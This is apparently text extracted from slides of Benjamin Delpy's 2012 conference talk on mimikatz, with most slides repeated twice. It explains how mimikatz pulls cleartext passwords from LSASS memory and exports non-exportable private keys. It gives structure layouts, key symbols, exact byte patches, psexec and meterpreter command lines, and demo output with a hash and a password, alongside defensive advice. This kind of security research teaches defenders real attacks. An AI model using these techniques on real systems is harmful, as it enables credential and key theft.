typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL DWORD unk0 PVOID unk1 PVOID unk2 PVOID unk3 ifdef _M_X64 BYTE unk4[32] elif defined _M_IX86 BYTE unk4[20] endif LUID LocallyUniqueIdentifier ifdef _M_X64 BYTE unk5[44] elif defined _M_IX86 BYTE unk5[36] endif LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PR
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5) workflow
mimikatz sekurlsa kerberos (nt5) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flink struct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCount PVOID unk0 PVOID unk1 PVOID unk2 DWORD unk3 DWORD unk4 PVOID unk5 PVOID unk6 PVOID unk7 LUID LocallyUniqueIdentifier
ifdef _M_IX86 DWORD unk8
endif DWORD unk9 DWORD unk10 PVOID unk11 DWORD unk12 DWORD unk13 PVOID unk14 PVOID unk15 PVOID unk16 [hellip] LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa demo time
mimikatz sekurlsa demo time
Final sekurlsa demo sekurlsalogonPasswords full
Final sekurlsa demo sekurlsalogonPasswords full
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30 30
mimikatz sekurlsa kerberos ldquohu rdquo
mimikatz sekurlsa kerberos ldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31 31
mimikatz sekurlsa mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32 32
LsaUnprotectMemory
mimikatz sekurlsa LsaEncryptMemory NT5
mimikatz sekurlsa LsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKey BYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
lsasrv
lsasrv
copyhellip
mimikatz sekurlsa LsaEncryptMemory NT6
mimikatz sekurlsa LsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34 34
InitializationVector BYTE[16]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD size DWORD tag DWORD type DWORD unk0 DWORD unk1 DWORD unk2 DWORD unk3 PVOID unk4 BYTE data etc KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv
lsasrv
typedef struct _KIWI_BCRYPT_KEY DWORD size DWORD type PVOID unk0 PKIWI_BCRYPT_KEY_DATA cle PVOID unk1 KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Security Packages
Protection Keys
Security Packages
Protection Keys
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionList lsasrvLogonSessionListCount
LIST_ENTRY ULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKey lsasrvg_pRandomKey
DESx lsasrvg_pDESXKey lsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz mimikatz privilegedebug Demande dACTIVATION du privilegravege SeDebugPrivilege OK mimikatz sekurlsalogonPasswords full Authentification Id 0234870 Package dauthentification NTLM Utilisateur principal Gentil Kiwi Domaine dauthentification vm-w8-rp-x msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 livessp nt (LUID KO)
mimikatz sekurlsa what we can do
mimikatz sekurlsa what we can do
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37 37
mimikatz crypto what is it
mimikatz crypto what is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38 38
mod_mimikatz_crypto
mimikatz crypto how itrsquos protected
mimikatz crypto how itrsquos protected
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39 39
Constraint for most user Unavailable for computer keys
certutil -importpfx mycertp12 NoExport certutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capi how it works
mimikatz crypto capi how it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40 40
mimikatz crypto capi how itrsquos exported ( level)
mimikatz crypto capi how itrsquos exported ( level)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42 42
mimikatz cryptoexportCertificates Emplacement CERT_SYSTEM_STORE_CURRENT_USERMy - Benjamin Delpy Container Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03 Provider Microsoft Enhanced Cryptographic Provider v10 Type AT_KEYEXCHANGE Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO (0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute Export public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================ Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0 Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BE Objet CN=Benjamin Delpy C=FR Il ne sagit pas dun certificat racine Hach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03 Fournisseur = Microsoft Enhanced Cryptographic Provider v10 La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de cryptage CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapi demo time
mimikatz crypto patchcapi demo time
Import export import as not exportablehellip export
Import export import as not exportablehellip export
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44 44
mimikatz crypto patchcapi limitations
mimikatz crypto patchcapi limitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45 45
mimikatz crypto cng how it works
mimikatz crypto cng how it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46 46
mimikatz crypto cng how itrsquos exported ( level)
mimikatz crypto cng how itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEM SYSTEM_MANDATORY_LABEL_NO_WRITE_UP SYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48 48
mimikatz cryptoexportKeys [user] Cleacutes CNG - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcng demo time
mimikatz crypto patchcng demo time
Import export import as not exportablehellip export again
Import export import as not exportablehellip export again
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50 50
mimikatz crypto patchcng limitations
mimikatz crypto patchcng limitations
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51 51
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz crypto memo
mimikatz crypto memo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53 53
mimikatz crypto what we can do
mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
